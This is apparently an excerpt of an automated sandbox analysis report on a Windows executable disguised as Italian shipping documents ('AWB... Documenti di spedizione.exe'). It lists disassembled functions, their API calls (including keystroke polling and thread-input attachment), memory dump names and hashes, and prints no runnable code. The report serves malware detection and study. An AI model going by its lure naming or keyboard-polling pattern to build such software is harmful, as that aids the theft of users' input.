                        Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044480E
                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                        • GetKeyState.USER32(000000A0), ref: 004448AA
                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                        • GetKeyState.USER32(000000A1), ref: 004448D9
                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                        • GetKeyState.USER32(00000011), ref: 00444903
                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                        • GetKeyState.USER32(00000012), ref: 0044492D
                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                        • GetKeyState.USER32(0000005B), ref: 00444958
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                        Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                        • String ID:
                        • API String ID: 3413494760-0
                        • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                        • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                        Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressProc_free_malloc$_strcat_strlen
                        • String ID: AU3_FreeVar
                        • API String ID: 2634073740-771828931
                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                        Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32 ref: 0046C63A
                        • CoUninitialize.OLE32 ref: 0046C645
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                        • IIDFromString.OLE32(?,?), ref: 0046C705
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 2294789929-1287834457
                        • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                        • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                        Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                        • ReleaseCapture.USER32 ref: 0047116F
                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                        • API String ID: 2483343779-2107944366
                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                        Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                        • _wcslen.LIBCMT ref: 00450720
                        • _wcscat.LIBCMT ref: 00450733
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat_wcslen
                        • String ID: -----$SysListView32
                        • API String ID: 4008455318-3975388722
                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                        Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                        • GetParent.USER32 ref: 00469C98
                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                        • GetParent.USER32 ref: 00469CBC
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 2360848162-1403004172
                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                        Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                        • String ID:
                        • API String ID: 262282135-0
                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                        Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                        Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                        • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                        • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                        • String ID:
                        • API String ID: 3771399671-0
                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                        Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                        Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 0-1603158881
                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                        Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMenu.USER32 ref: 00448603
                        • SetMenu.USER32(?,00000000), ref: 00448613
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                        • IsMenu.USER32(?), ref: 004486AB
                        • CreatePopupMenu.USER32 ref: 004486B5
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                        • DrawMenuBar.USER32 ref: 004486F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0
                        • API String ID: 161812096-4108050209
                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                        Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe), ref: 00434057
                        • LoadStringW.USER32(00000000), ref: 00434060
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                        • LoadStringW.USER32(00000000), ref: 00434078
                        • _wprintf.LIBCMT ref: 004340A1
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                        Strings
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 00434040
                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
